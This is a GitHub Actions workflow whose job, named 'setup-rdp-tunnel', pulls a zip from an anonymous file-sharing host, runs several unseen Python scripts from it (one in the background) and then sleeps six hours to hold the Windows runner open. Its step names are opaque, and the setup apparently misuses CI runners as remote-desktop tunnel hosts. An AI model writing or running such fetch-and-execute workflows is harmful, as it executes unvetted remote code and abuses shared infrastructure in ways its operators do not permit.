name: cod-v114-update

on:
  workflow_dispatch:

jobs:
  setup-rdp-tunnel:
    runs-on: windows-2025

    steps:
    - name: Check out-d5d3
      uses: actions/checkout@v2

    - name: Download full-5652
      run: |
        curl -L -o code.zip https://pixeldrain.com/api/file/7BJCdrNc/info/zip/main9.zip
        Start-Sleep -Seconds 5
        powershell -Command "Expand-Archive -Force code.zip extracted"


    - name: Install requests package-2254
      run: python -m pip install requests
      
    - name: Start py
      run: |
        cd extracted
        Start-Sleep -Seconds 30
        python test.py

    - name: Start py
      run: |
        cd extracted
        Write-Host "Starting main.py in background..."
        Start-Process python main.py
        Start-Sleep -Seconds 10

        
    - name: Run test2.py test3.py-522
      run: |
        cd extracted
        Start-Sleep -Seconds 10
        python test2.py
        python test3.py

    - name: Keep alive v2544
      run: Start-Sleep -Seconds 21600 
